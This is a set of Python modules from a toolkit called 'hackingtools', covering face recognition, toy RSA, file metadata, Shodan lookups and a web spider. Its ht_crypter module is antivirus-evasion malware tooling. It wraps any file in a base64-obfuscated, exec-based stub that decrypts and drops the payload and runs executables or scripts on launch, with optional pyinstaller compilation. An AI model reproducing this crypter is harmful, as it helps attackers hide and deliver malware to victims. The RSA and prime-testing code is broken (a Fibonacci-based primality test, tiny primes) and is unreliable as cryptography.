		for name, (top, right, bottom, left) in predictions:
			counter += 1
			# Draw a box around the face using the Pillow module
			draw.rectangle(((left, top), (right, bottom)), outline=(0, 0, 255))

			# There's a bug in Pillow where it blows up with non-UTF-8 text
			# when using the default bitmap font
			name = name.encode("UTF-8")

			self.saveCroppedImage(img_path, (top, right, bottom, left), model_path, name, counter)

			if 'unknown' == str(name):
				# apply a gaussian blur on this unknown face
				print('There is an unknown object... Should be blur on newer version')

			# Draw a label with a name below the face
			text_width, text_height = draw.textsize(name)
			draw.rectangle(((left, bottom - text_height - 10), (right, bottom)), fill=(0, 0, 255), outline=(0, 0, 255))
			draw.text((left + 6, bottom - text_height - 5), name, fill=(255, 255, 255, 255))

		# Remove the drawing library from memory as per the Pillow docs
		del draw

		# Return the resulting image
		pil_image.save(img_path)
		return Image.open(img_path).filename

	def trainFromZip(self, zipFile, new_model_name='new_trained.clf', first_folder_name='model', n_neighbors=1):
		unzipper = ht.getModule('ht_unzip')
		unzipper.extractFile(zipFile, output_dir_new=output_dir)
		new_model = os.path.join(output_dir_models, new_model_name)
		classifier = self.train(os.path.join(output_dir, first_folder_name), model_save_path=new_model, n_neighbors=int(n_neighbors), verbose=True)
		return new_model
	
	def predictFromZip(self, zipFile, first_folder_name, model_path='trained.clf', trainZipFile=None, first_folder_name_training_zip=None, n_neighbors=1):
		if trainZipFile:
			if not first_folder_name_training_zip:
				_, first_folder_name_training_zip = os.path.split(trainZipFile)
				first_folder_name_training_zip = first_folder_name_training_zip.split('.')[0]
			model_path = self.trainFromZip(zipFile=trainZipFile, new_model_name='{f}.{clf}'.format(f=first_folder_name_training_zip, clf=config['models_tests_extension']), first_folder_name=first_folder_name_training_zip, n_neighbors=int(n_neighbors))
		else:
			model_path = os.path.join(output_dir_models, model_path)

		unzipper = ht.getModule('ht_unzip')
		unzipper.extractFile(zipFile, output_dir_new=output_dir)

		folder = os.path.join(output_dir, first_folder_name)

		images = []

		for imageFile in os.listdir(folder):
			if not os.path.isdir(os.path.join(folder, imageFile)):
				images.append(self.predictImage(os.path.join(folder, imageFile), model_path))
		
		return unzipper.zipFiles(images)

	def predictImage(self, imageFile, model_path='trained.clf', trainZipFile=None, first_folder_name=None, n_neighbors=1):
		if trainZipFile:
			if not first_folder_name:
				_, first_folder_name = os.path.split(trainZipFile)
				first_folder_name = first_folder_name.split('.')[0]
			model_path = self.trainFromZip(zipFile=trainZipFile, new_model_name='{f}.{clf}'.format(f=first_folder_name, clf=config['models_tests_extension']), first_folder_name=first_folder_name, n_neighbors=int(n_neighbors))
		else:
			model_path = os.path.join(output_dir_models, model_path)

		predictions = self.predict(imageFile, model_path=model_path)
		
		# Print results on the console
		for name, (top, right, bottom, left) in predictions:
			Logger.printMessage(message="predictImage", description="Found {} at ({}, {})".format(name, left, top), debug_module=True)

		return self.show_prediction_labels_on_image(imageFile, predictions, model_path)


from hackingtools.core import Logger, Config, Utils
import hackingtools as ht

import random
import base64
import os

config = Config.getConfig(parentKey='modules', key='ht_rsa')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

class StartModule():
	'''How to use:

	prime_a, prime_b = self.getRandomKeypair()
	public, private = self.generate_keypair(prime_a, prime_b)

	print('Public key: {pub} - Private Key: {pri}'.format(pub=public, pri=private))

	encrypted_msg = self.encrypt(private, message)
	print('Message ciphered: {msg}'.format(msg=encrypted_msg))

	decrypted_msg = self.decrypt(public, encrypted_msg)
	print('Message deciphered: {msg}'.format(msg=decrypted_msg))
	
	'''

	def __init__(self):
		pass

	def help(self):
		Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_rsa'))

	def generate_keypair(self, prime_a, prime_b):
		if not (Utils.isPrime(int(prime_a)) and Utils.isPrime(int(prime_b))):
			Logger.printMessage(message='{methodName}'.format(methodName='generate_keypair'), description=config['bad_identical_prime'], debug_module=True, is_error=True)
			return config['bad_identical_prime']
		elif prime_a == prime_b:
			Logger.printMessage(message='{methodName}'.format(methodName='generate_keypair'), description=config['p_q_equal_error'], debug_module=True, is_error=True)
			return config['p_q_equal_error']
		else:
			#n = pq
			n = prime_a * prime_b

			#Phi is the totient of n
			phi = (prime_a-1) * (prime_b-1)

			#Choose an integer e such that e and phi(n) are coprime
			e = random.randrange(1, phi)

			#Use Euclid's Algorithm to verify that e and phi(n) are comprime
			g = Utils.euclides(e, phi)
			while g != 1:
				e = random.randrange(1, phi)
				g = Utils.euclides(e, phi)

			#Use Extended Euclid's Algorithm to generate the private key
			d = Utils.multiplicativeInverse(e, phi)
			
			#Return public and private keypair
			#Public key is (e, n) and private key is (d, n)
			return ((e, n), (d, n))

	def getRandomKeypair(self, length = 8):
		Logger.printMessage(message='{methodName}'.format(methodName='getRandomKeypair'), debug_module=True)
		prime_a = ''
		prime_b = ''
		while prime_a == prime_b:
			while prime_a == '':
				prime_a = Utils.getRandomPrimeByLength(length)
			while prime_b == '':
				prime_b = Utils.getRandomPrimeByLength(length)
		print(prime_a, prime_b)
		return (prime_a, prime_b)
	
	def encrypt(self, private_key, plaintext):
		try:
			Logger.printMessage(message='{methodName}'.format(methodName='encrypt'), description='{private_key} - {msg}'.format(private_key=private_key, msg=plaintext[0:10]), debug_module=True)
			#Unpack the key into it's components
			key, n = private_key
			ba64 = base64.b64encode(plaintext)
			ashex = Utils.asciiToHex(ba64)
			hexba64 = Utils.hexToBase64(ashex)
			ba64un = Utils.joinBase64(hexba64)
			decasc = Utils.decimalToAscii(ba64un)
			mensaje = Utils.textToAscii(decasc)
			Logger.printMessage(message='{methodName}'.format(methodName='encrypt'), description='{msg}'.format(msg=mensaje[0:10]), debug_module=True)
			mensaje1 = [(ord(chr(char)) ** key) % n for char in mensaje]
			mensajeHex = Utils.asciiToHex(mensaje1)
			mensajeBase64 = Utils.hexToBase64(mensajeHex)
			mensajeFinalBase64 = Utils.joinBase64(mensajeBase64)
			return mensajeFinalBase64.decode("utf-8")
		except Exception as e:
			Logger.printMessage(message='{methodName}'.format(methodName='encrypt'), description='{msg}'.format(msg=e), debug_error=True)
			return

	def decrypt(self, public_key, ciphertext):
		Logger.printMessage(message='{methodName}'.format(methodName='decrypt'), description='{public_key}'.format(public_key=public_key), debug_module=True)
		#Unpack the key into its components
		key, n = public_key
		menRec = Utils.asciiToBase64(ciphertext.encode('utf-8'))
		menHex = Utils.base64ToHex(menRec)
		menDec = Utils.hexToDecimal(menHex)
		Logger.printMessage(message='{methodName}'.format(methodName='decrypt'), description='{msg}'.format(msg=menDec[0:10]), debug_module=True)
		menDesc = [((char ** key) % n) for char in menDec]
		menAscii = Utils.decimalToAscii(menDesc)
		decasc = Utils.asciiToBase64(''.join(menAscii).encode())
		hexba64 = Utils.base64ToHex(decasc)
		ashex = Utils.hexToDecimal(hexba64)
		deasc = Utils.decimalToAscii(ashex)
		ba64 = base64.b64decode(deasc.encode())
		return ba64


from hackingtools.core import Logger, Config
import hackingtools as ht

from PIL import Image
from PyPDF2 import PdfFileReader, PdfFileWriter

import os

config = Config.getConfig(parentKey='modules', key='ht_metadata')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

class StartModule():

	def __init__(self):
		pass

	def help(self):
		Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_metadata'))

	def get_image_exif(self, filename):
		Logger.printMessage(message='{methodName}'.format(methodName='get_image_exif'), description=filename, debug_module=True)
		try:
			img_file = Image.open(filename)
			img_file.verify()
			info = img_file._getexif()
			return info
		except Exception as e:
			Logger.printMessage(message='{methodName}'.format(methodName='exception'), description=e, debug_module=True)
			return e
		return -1

	def get_pdf_exif(self, pdf_file):
		Logger.printMessage(message='{methodName}'.format(methodName='get_pdf_exif'), description=pdf_file, debug_module=True)
		info = ''
		data = {}
		try:
			with open(pdf_file, 'rb') as f:
				pdf = PdfFileReader(f)
				info = pdf.getDocumentInfo()
				number_of_pages = pdf.getNumPages()
			for a in info:
				data[a] = info[a]
			return data
		except Exception as e:
			Logger.printMessage(message='{methodName}'.format(methodName='exception'), description=e, debug_module=True)
			return e
		return -1



from hackingtools.core import Logger, Utils, Config
import hackingtools as ht
import os

config = Config.getConfig(parentKey='modules', key='ht_twitter')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

class StartModule():

	def __init__(self):
		pass

	def help(self):
		Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_twitter'))



from setuptools import setup, find_packages

requirements = ''
try:
    with open('requirements.txt') as f:
        requirements = f.read().splitlines()
except:
    print('You should install on Python 3.7+')

setup(name='hackingtools',
        version='0.9.939.512',
        description='All Hacking Tools in this Python with Manually Created Modules',
        url='http://github.com/ConnorXploit/hackingtools-py',
        author='Connor',
        author_email='cgehminecraft@gmail.com',
        license='MIT',
        packages=find_packages(include=['hackingtools*']),
        include_package_data = True,
        package_data = {
            'hackingtools/core': ['config.json'],
            '': ['requirements.txt']
        },
        classifiers=[
            "Programming Language :: Python :: 3.7",
            "License :: OSI Approved :: MIT License"
        ],
        install_requires=requirements,
        zip_safe=False)


from . import Config, Logger, Utils
config = Config.getConfig(parentKey='core', key='Utils')
config_utils = Config.getConfig(parentKey='core', key='Utils', subkey='dictionaries')
from colorama import Fore

import random
import requests
import base64
import os
import socket
from itertools import product 

# File Manipulation
def getFileContentInByteArray(filePath):
    """Function that returns a ByteArray with the data from a file
    
    Arguments:
        filePath {String} -- The Path of the file and the file name
    
    Returns:
        byteArray -- The content of the file / None
    """
    try:
        Logger.printMessage(message='{methodName}'.format(methodName='getFileInByteArray'), description='{filePath}'.format(filePath=filePath), debug_core=True)
        the_file = open(filePath, "rb")
        file_data = the_file.read()
        the_file.close()
        return file_data
    except:
        pass
    return None
        
def saveToFile(content, fileName):
    """Saves a new file with a Byte Array and a fileName
    
    Arguments:
        content {byteArray} -- The content we want to write into the file
        fileName {String} -- The file name
    
    Returns:
        boolean -- If saved True, else False
    """
    try:
        Logger.printMessage(message='{methodName}'.format(methodName='saveToFile'), description='{filename}'.format(filename=fileName), debug_core=True)
        the_file = open(fileName, "w")
        the_file.write(content)
        the_file.close()
        return True
    except:
        pass
    return False

def emptyDirectory(directory):
    """
    Cleans a directory given as param
    Be carefull with the 
    
    Arguments:
        dir : str
        
            output_dir variable in modules,
            for example, ht_crypter, it has a
            path automatically created
            for this function
    Returns:
        bool

            Returns if all was OK
    """
    try:
        #Logger.printMessage(message='emptyDirectory', description='Would empty: {path}'.format(path=directory), color=Fore.YELLOW)
        #if os.path.isdir(directory):
        #    shutil.rmtree(directory)
        #    return True
        # ! Temporary ommited
        return False
    except:
        return False

def getValidDictNoEmptyKeys(data):
    print(data)
    final_data = {}
    if isinstance(data, str):
        return data
    for d in data:
        if data[d]:
            if isinstance(data[d], str):
                print('Texto encontrado: ', data[d], ' en ', d)
                final_data[d] = data[d]
            else:
                print('Dict encontrado: en ', d)
                final_data[d] = getValidDictNoEmptyKeys(data[d])
    return final_data

def getMyPublicIP():
    try:
        return requests.get('https://api.ipify.org').text
    except:
        return '127.0.0.1'

def getMyLanIP():
    return str(socket.gethostbyname(socket.gethostname()))

def getMyLocalIP():
    return '127.0.0.1'

# Maths
def euclides(a, b):
    """Euclid's algorithm for determining the greatest common divisor
    Use iteration to make it faster for larger integers
    
    Arguments:
        a {integer} -- Value 1 to use in euclides
        b {integer} -- Value 2 to use in euclides
    
    Returns:
        integer -- Euclides of a and b
    """
    Logger.printMessage(message='{methodName}'.format(methodName='euclides'), description='{a} - {b}'.format(a=a, b=b), debug_core=True)
    while b != 0:
        a, b = b, a % b
    return a

def multiplicativeInverse(e, phi):
    """Euclid's extended algorithm for finding the multiplicative inverse of two numbers
    
    Arguments:
        e {integer} -- Euclides value
        phi {integer} -- Phi value
    
    Returns:
        integer -- The inverse multiplicative of e and phi
    """
    Logger.printMessage(message='{methodName}'.format(methodName='multiplicativeInverse'), description='{e} - {phi}'.format(e=e, phi=phi), debug_core=True)
    # See: http://en.wikipedia.org/wiki/Extended_Euclidean_algorithm
    def eea(a,b):
        if b==0:return (1,0)
        (q,r) = (a//b,a%b)
        (s,t) = eea(b,r)
        return (t, s-(q*t) )

    inv = eea(e,phi)[0]
    if inv < 1: inv += phi #we only want positive values
    return inv

def isPrime(number):
    """Tests to see if a number is prime.
    
    Arguments:
        number {integer} -- The number to test if is a prime number
    
    Returns:
        boolean -- If is prime True, else False
    """
    Logger.printMessage(message='{methodName}'.format(methodName='isPrime'), description='{n}'.format(n=number), debug_core=True)
    excepted = (0, 2, 4, 5, 6, 8)
    if not int(str(number)[-1]) in excepted:
        division = 0
        try:
            half = number/2
            if not isinstance(half, float):
                return False
        except:
            return False
        fibo_1 = 0
        fibo_2 = 1
        fibo_temp = fibo_1 + fibo_2
        while fibo_temp < int(number/2):
            if number % fibo_temp == 0:
                division += 1
            fibo_1 = fibo_2
            fibo_2 = fibo_temp
            fibo_temp = fibo_1 + fibo_2
            if division == 2:
                return False
        if division == 1:
            return True

def getRandomPrimeByLength(length = 8):
    """Returns a random prime number with the length you choose
    
    Keyword Arguments:
        length {integer} -- The length of the number we want (default: {8})
    
    Returns:
        integer -- A random prime number with the length you specified / -1
    """
    try:
        length = int(length)
    except:
        length = 8
    try:
        while True:
            n=random.randint(10**(length-1), 10**length)
            if isPrime(n):
                return n
    except:
        return -1

# Text Treatment
def textToAscii(content):
    """Transform text in String to ASCII Array
    
    Arguments:
        content {String} -- The String content we want to transform into ASCII Array
    
    Returns:
        Array -- The content String transformed into an Array in ASCII
    """
    Logger.printMessage(message='{methodName}'.format(methodName='textToAscii'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return [ord(pal) for pal in content]

def asciiToHex(content):
    """Transform ASCII Array to Hex Array
    
    Arguments:
        content {Array} -- An Array with some content in ASCII for transforming into Hex Array
    
    Returns:
        Array -- The content ASCII Array transformed into an Hex Array
    """
    Logger.printMessage(message='{methodName}'.format(methodName='AsciiToHex'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return [hex(n)[2:] for n in content]

def hexToBase64(content):
    """Transform Hex Array to Base64 Array
    
    Arguments:
        content {Array} -- An Array with some content in Hex for transforming into Base64 Array
    
    Returns:
        Array -- The content transformed into an Base64 Array
    """
    Logger.printMessage(message='{methodName}'.format(methodName='HexToBase64'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return [base64.b64encode(n.encode()) for n in content]

def joinBase64(content):
    """Transform Base64 Array to String
    
    Arguments:
        content {Array} -- An Array with some content in Base64 for transforming into a String
    
    Returns:
        String -- The content Base64 Array joined and transformed from Base64 decoded and encoded to String
    """
    Logger.printMessage(message='{methodName}'.format(methodName='joinBase64'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return (''.join([content[i].decode('utf-8') for i in range(0, len(content))])).encode()

def asciiToBase64(content):
    """Transform ASCII String to Base64 Array
    
    Arguments:
        content {String} -- A String with some content in ASCII for transforming into a Base64 Array
    
    Returns:
        Array -- The content in ASCII String transformed into a Base64 Array
    """
    Logger.printMessage(message='{methodName}'.format(methodName='asciiToBase64'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return [content[i:i+4] for i in range(0, len(content), 4)]

def base64ToHex(content):
    """Transform Base64 Array to Hex Array
    
    Arguments:
        content {Array} -- The content in a Base64 Array to transform into an Hex Array
    
    Returns:
        Array -- The content in Base64 Array transformed into an Hex Array
    """
    Logger.printMessage(message='{methodName}'.format(methodName='base64ToHex'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return [base64.b64decode(b64) for b64 in content]

def hexToDecimal(content):
    """Transform Hex Array to Decimal Array
    
    Arguments:
        content {Array} -- The content in an Hex Array to transform to a Decimal Array
    
    Returns:
        Array -- The content in an Hex Array transformed into a Decimal Array
    """
    Logger.printMessage(message='{methodName}'.format(methodName='hexToDecimal'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return [int(hexa.decode("UTF-8"), 16) for hexa in content]

def decimalToAscii(content):
    """Transform Decimal Array to ASCII String
    
    Arguments:
        content {Array} -- The content in a Decimal Array to transform to an ASCII String
    
    Returns:
        String -- The content in a Decimal Array transformed to an ASCII String
    """
    Logger.printMessage(message='{methodName}'.format(methodName='decimalToAscii'), description='Length: {length} - {content} ...'.format(length=len(content), content=content[0:10]), debug_core=True)
    return ''.join([chr(dec) for dec in content])

def randomText(length=8, alphabet='lalpha'):
    try:
        return ''.join(random.SystemRandom().choice(config_utils[alphabet]) for _ in range(int(length)))
    except Exception as e:
        Logger.printMessage(message=randomText, description=e, is_error=True)

def getCombinationPosibilitiesLength(alphabet, length):
    return [''.join(x) for x in product(config_utils[alphabet], repeat=length)]

def getDict(length=8, maxvalue=10000, alphabet='lalpha'):
    res = getCombinationPosibilitiesLength(alphabet=alphabet, length=length)
    Logger.printMessage(message='getDict', description='{data} - {count}'.format(data=res[:10], count=len(res)), debug_core=True)
    return res



# === Crypts any file using ht_rsa module and some Utils. For now, is FUD 100% ===

"""
With this module, we can crypt any file we want 
for not been detected, for example, by antiviruses.
Currently it support's the following 2 public functions and 4 private functions:

Public:

1. **crypt_file** - Crypts any file with ht_rsa functions and some utils and returns crypted file 100% FUD (jump to section in [[ht_crypter.py#crypt_file]] )

2. **createStub** - Creates a file with the stub (decrypt functions and pk for rsa) included into the file for been 100% FUD (jump to section in [[ht_crypter.py#createStub]] )

#TODO MORE HEREEE

"""

from hackingtools.core import Logger, Config, Utils
import hackingtools as ht 

import binascii
import sys
from argparse import ArgumentParser
import os.path
import math
from random import randint
import base64
import binascii
import random
import shutil

config = Config.getConfig(parentKey='modules', key='ht_crypter')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

class StartModule():

# === __init__ ===
	def __init__(self):
		Utils.emptyDirectory(output_dir)
		pass

# === help ===
	def help(self):
		Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_crypter'))

# === convertToExe ===
	def convertToExe(self, stub_name):
		"""
		Convert's given Python file path in String into a new one with the same name and .exe as extension
		Compile's with pyinstaller and could be change it's params in config.json
		
		Arguments
		---------
			stub_name : str
				
				File path to convert to exe
		"""
		Logger.printMessage(message='{methodName}'.format(methodName='convertToExe'), description='{stub_name}'.format(stub_name=stub_name), debug_module=True)
		# Convert py to exe with pyinstaller
		import os
		os.system(config['pyinstaller'].format(path=os.path.dirname(stub_name)) + " " + stub_name)
		filename = '{file}.exe'.format(file=stub_name.split('.')[0].split('\\')[-1])

		file_to_move = os.path.abspath(os.path.join('dist', '{file}'.format(file=filename)))
		new_file = os.path.abspath(os.path.join(os.path.dirname(stub_name), filename))

		if os.path.isfile(file_to_move) and not os.path.isfile(new_file):
			os.rename(file_to_move, new_file)

		new_spec_file = '{name}.spec'.format(name=new_file.split('.')[0])
		if os.path.isfile(new_spec_file):
			os.remove(new_spec_file)

		build_dir = os.path.abspath(os.path.join('build', '{file}'.format(file=filename.split('.')[0])))
		if os.path.isdir(build_dir):
			shutil.rmtree(build_dir)

		if os.path.isfile(file_to_move):
			os.remove(file_to_move)

		spec_file = os.path.abspath('{file}.spec'.format(file=filename.split('.')[0]))
		if os.path.isfile(spec_file):
			os.remove(spec_file)

# === createStub ===
	def createStub(self, crypto_data_hex, public_key, drop_file_name, save_name, is_iterating=False, is_last=False, convert=False):
		"""
		Create's the stub for the crypter and 
		has some courious params he have to see
		
		Arguments
		---------
			crypto_data_hex : str

				File path that want to crypt
			public_key : str
			
				New File name for crypted file when 
				return's it
			drop_file_name : str
				New File name for crypted file when 
				return's it
			save_name : str
				New File name for crypted file when 
				return's it
		
		Keyword Arguments:
			is_iterating : bool
			
				Compile's the final file if we select 
				it (default: {False})
			is_last : bool
			
				Internal variable for looping on the 
				crypting (default: {False})
			convert : bool
				
				Internal varuable for looping on the 
				crypting (default: {1})
		
		Returns
		-------
			str
			
				Crypted file path name / None
		"""
		stub = ''
		if is_last:
			stub = "import argparse, math, base64, binascii, random, sys, subprocess, os\nfrom random import randint\n"
			stub += "cdx = \"" + crypto_data_hex + "\"\n"
			stub += "drpnm = \"" + drop_file_name + "\"\n"
			stub += "pk = ({a}, {b})\n".format(a=public_key[0], b=public_key[1])
			stub += """
def dcy(pk, cptx):
	k, n = pk
	mensajeRecibido = __reBa64__(cptx.encode('utf-8'))
	mensajeHexRecibido = __ba64Hex__(mensajeRecibido)
	mensajeDecimalRecibido = __hexDec__(mensajeHexRecibido)
	mensajeDescifrado = [((c ** k) % n) for c in mensajeDecimalRecibido]
	mensaje_de_ascii = __deAS__(mensajeDescifrado)
	decasc = __reBa64__(''.join(mensaje_de_ascii).encode())
	hexba64 = __ba64Hex__(decasc)
	ashex = __hexDec__(hexba64)
	deasc = __deAS__(ashex)
	ba64 = base64.b64decode(deasc.encode())
	return ba64
def __reBa64__(m):
	mBa64 = [m[i:i+4] for i in range(0, len(m), 4)]
	return mBa64
def __ba64Hex__(m):
	mHx = [base64.b64decode(b64) for b64 in m]
	return mHx
def __hexDec__(m):
	mDec = [int(hexa.decode("UTF-8"), 16) for hexa in m]
	return mDec
def __deAS__(m):
	m1 = ''.join([chr(d) for d in m])
	return m1
def __meAS__(m):
	men = [ord(p) for p in m]
	return men
dcy_data = dcy(pk=pk, cptx=cdx)
"""
		if is_iterating:
			stub += "cdx = \"" + crypto_data_hex + "\"\n"
			stub += "pk = ({a}, {b})\n".format(a=public_key[0], b=public_key[1])
			stub += "dcy_data = dcy(pk=pk, cptx=cdx)\n"
			stub += "exec(dcy_data)"
		else:
			stub += """
image_extensions = ('jpg', 'jpeg', 'bpm', 'ico', 'png')
exec_extensions = ('bat', 'exe', 'vbs', 'ps1')
python_extensions = ('py')
nf = open(drpnm, 'wb')
try:
	nf.write(dcy_data)
except:
	pass
nf.close()
if os.path.exists(drpnm):
	if drpnm.split('.')[1] in image_extensions:
		imageViewerFromCommandLine = {'linux':'xdg-open', 'win32':'explorer', 'darwin':'open'}[sys.platform]
		subprocess.run([imageViewerFromCommandLine, drpnm], close_fds=True)
	if drpnm.split('.')[1] in exec_extensions and sys.platform == 'win32':
		os.system(drpnm)
	if drpnm.split('.')[1] in python_extensions:
		exec(dcy_data)
		proc = subprocess.Popen('python {fn}'.format(fn=drpnm), shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
"""

		stub_base64 = base64.b64encode(stub.encode('utf-8'))
		stub = "import base64\n"
		stub += "data = {st_ba64}\n".format(st_ba64=stub_base64)
		stub += "exec(base64.b64decode(data))"
		
		Utils.saveToFile(content=stub, fileName=save_name)

		if convert:
			self.convertToExe(save_name)

# === crypt_file ===
	def crypt_file(self, filename, new_file_name, drop_file_name='dropped.py', prime_length=4, compile_exe=False, is_iterating=False, iterate_count=1, is_last=False):
		"""Crypt's a file when some params we have to use
		
		Arguments
		---------
			filename : str
			
				File path that want to crypt
			new_file_name : str
			
				New File name for crypted file 
				when return's it
		
		Keyword Arguments
		-----------------
			drop_file_name : str
			
				Drop a new file on execute the 
				cryted file (default: {'dropped.py'})
			prime_length : int
			
				Set a prime length for auto-generating
				 the primes for the cryptography 
				 (default: {4})
			compile_exe : bool
			
				Compile's the final file if 
				we select it (default: {False})
			is_iterating : bool
			
				Internal variable for looping 
				on the crypting (default: {False})
			iterate_count : int
			
				Internal variable for looping 
				on the crypting (default: {1})
			is_last : bool
			
				Internal variable for looping 
				on the crypting (default: {False})
		
		Returns
		-------
			str

				Crypted file path name / None
		"""
		Logger.printMessage(message='{methodName}'.format(methodName='crypt_file'), description='{filename}'.format(filename=filename), debug_module=True)
		temp_filename = filename
		if iterate_count > 1:
			temp_filename = filename
			for i in range(1, iterate_count):
				if i == iterate_count - 1:
					is_last = True
				temp_filename = self.crypt_file(filename=temp_filename, new_file_name=new_file_name, drop_file_name=drop_file_name, compile_exe=False, is_iterating=True, iterate_count=1, is_last=is_last)
		
		filename = temp_filename
		if filename and new_file_name:
			crypter_rsa = ht.getModule('ht_rsa')
			data = Utils.getFileContentInByteArray(filePath=filename)
			prime_a, prime_b = crypter_rsa.getRandomKeypair(prime_length)
			public, private = crypter_rsa.generate_keypair(prime_a, prime_b)
			crypted_data = crypter_rsa.encrypt(private_key=private, plaintext=data)
			new_file = new_file_name
			if not '.' in new_file:
				new_file = '{file}.py'.format(file=new_file)

			if compile_exe:
				self.createStub(crypto_data_hex=crypted_data, public_key=public, drop_file_name=drop_file_name, save_name=new_file, is_iterating=is_iterating, is_last=is_last, convert=True)
				new_file = '{file}.exe'.format(file=new_file.split('.')[0])
			else:
				self.createStub(crypto_data_hex=crypted_data, public_key=public, drop_file_name=drop_file_name, save_name=new_file, is_iterating=is_iterating, is_last=is_last)
			return new_file
		else:
			return None


from shodan import Shodan 
import requests
import json
import hackingtools as ht
from hackingtools.core import Logger, Config
import time
from colorama import init, Fore
import os

config = Config.getConfig(parentKey='modules', key='ht_shodan')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

class StartModule():

    api = None

    def __init__(self):
        self.settingApi()

    def help(self):
        Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_shodan'))
        
    def settingApi(self, shodanKeyString=None):
        try:
            if not shodanKeyString:
                shodanKeyString = config['api_key']
            Logger.printMessage(message='{methodName}'.format(methodName='settingApi'), description=shodanKeyString, debug_core=True)
            self.api = Shodan(shodanKeyString)
        except:
            Logger.printMessage(message='{methodName}'.format(methodName='settingApi'), description=config['bad_api_key_error'], debug_core=True, is_error=True) 

    def getIPListfromServices(self, serviceName, shodanKeyString=None):
        Logger.printMessage(message='{methodName}'.format(methodName='getIPListfromServices'), description='{param}'.format(param=serviceName), debug_module=True)
        if not self.api and not shodanKeyString:
            self.settingApi(Config.getApiKey('shodan_api'))
        if self.api or shodanKeyString:
            if shodanKeyString:
                self.settingApi(shodanKeyString=shodanKeyString)
            try:
                result = self.api.search(serviceName)
                dict_obj = []
                for res in result['matches']:
                    dict_obj.append(res['ip_str'].encode('utf-8').decode('utf-8'))
                return dict_obj
            except:
                return []
        else:
            return []

    def queryShodan(self, category=''):
        try:
            Logger.printMessage(message='{methodName}'.format(methodName='queryShodan'), debug_module=True)

            days_back = int(baseConfig.osintDays) + 1
            limit_date = (datetime.date.today() - datetime.timedelta(days=days_back)).strftime(config['search_limit_date_format'])
            search_term = 'category:{category} after:{time}'.format(category=category, time=limit_date)

            results = self.api.search(search_term, page=1)

            Logger.printMessage(message='{message_result}: {res}'.format(message_result=config['msg_result_found'], res=results['total']), debug_module=True)

            pages = results['total']/100

            if results['total']%100 > 0:
                pages += 1

                ip_list = []

                for n in range(1, pages+1):
                    if n > 1:
                        results = self.api.search(search_term, page=n)

                    Logger.printMessage(message='{msg_fetch_page} {num} of {pages}...'.format(msg_fetch_page=config['msg_fetch_page'], num=n, pages=pages), debug_module=True)

                    for result in results['matches']:
                        ip_list.append(result['ip_str'])

                return ip_list

            else:
                return []

        except shodan.APIError as e:
            Logger.printMessage(message='{error}: {error_msg}'.format(error=config['error'], error_msg=e), debug_module=True)
            return []

    def shodan_search_host(self, ip):
        res = {}
        try:
            Logger.printMessage(message='{methodName}'.format(methodName='shodan_search_host'), description='{param}'.format(param=ip), debug_module=True)
            host = self.api.host(ip)

            interesting_data = config['scan_interesting_data_keys']

            for posibe_data in interesting_data:
                try:
                    if host[posibe_data]:
                        if isinstance(host[posibe_data], dict):
                            if posibe_data in 'data':
                                res[posibe_data] = {}
                                res[posibe_data]['port'] = host[posibe_data]['port']
                                res[posibe_data]['data'] = host[posibe_data]['data']
                            else:
                                res[posibe_data] = host[posibe_data][0]
                        else:
                            res[posibe_data] = host[posibe_data]
                    elif host.get(posible_data):
                        res[posibe_data] = host.get(posible_data)
                except:
                    try:
                        if host.get(posible_data):
                            res[posibe_data] = host.get(posible_data)
                    except:
                        pass

        except Exception as e:
            Logger.printMessage(message='Warning: {0}... Retrying in 0,5 seconds...'.format(e), color=Fore.YELLOW, debug_module=True)
            time.sleep(0.4)
            return self.shodan_search_host(ip)
        return res

    def getSSLCerts(self, ip):
        res = {}
        try:
            Logger.printMessage(message='{methodName}'.format(methodName='getSSLCerts'), debug_module=True)
            for banner in api.stream.ports([443, 8443]):
                if 'ssl' in banner:
                    res['ssl'] = banner['ssl']
        except Exception as e:
            res['ssl'] = None
        return res

    def searchFromConfig(self, search='', keyword=''):
        if search != '' and keyword != '' and config[search]:
            Logger.printMessage(message='{methodName}'.format(methodName='searchFromConfig', description=search), debug_module=True)
            url = ("https://api.shodan.io/{search}&key={api}".format(search=config[search], api=self.api)).format(ip=keyword) # IP because config {ip}
            request = requests.get(url)
            txt = request.text
            return json.loads(txt)
        else:
            Logger.printMessage(message='{methodName}'.format(methodName='searchFromConfig', description='suggestions_cause_bad_search'), debug_module=True)
            sugg_conf = []
            res = {}
            for configuration in config:
                if configuration.startswith('shodan_'):
                    sugg_conf.append(configuration)
            res['search_options'] = sugg_conf
            return res


from hackingtools.core import Logger, Utils, Config
import hackingtools as ht
import os
from colorama import Fore

import multiprocessing
import sys
from bs4 import BeautifulSoup
import urllib.request as urllib3
import time
import mechanize
import inspect

config = Config.getConfig(parentKey='modules', key='ht_spider')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

class StartModule():

	def __init__(self):
		pass
	
	def help(self):
		Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_spider'))

	def crawl(self, url=None, proxies=None, depth=100, proxyhost=None, proxyuser=None, proxypassword=None, proxyport=None, proxysecure="http"):
		Logger.printMessage(message='{methodName}'.format(methodName='crawl'), debug_module=True)
		try:
			depth = int(depth)
			totalDeepCrawled = 0
			linksVisited = [url]
			totalProfundity = 0
			webForms = {}
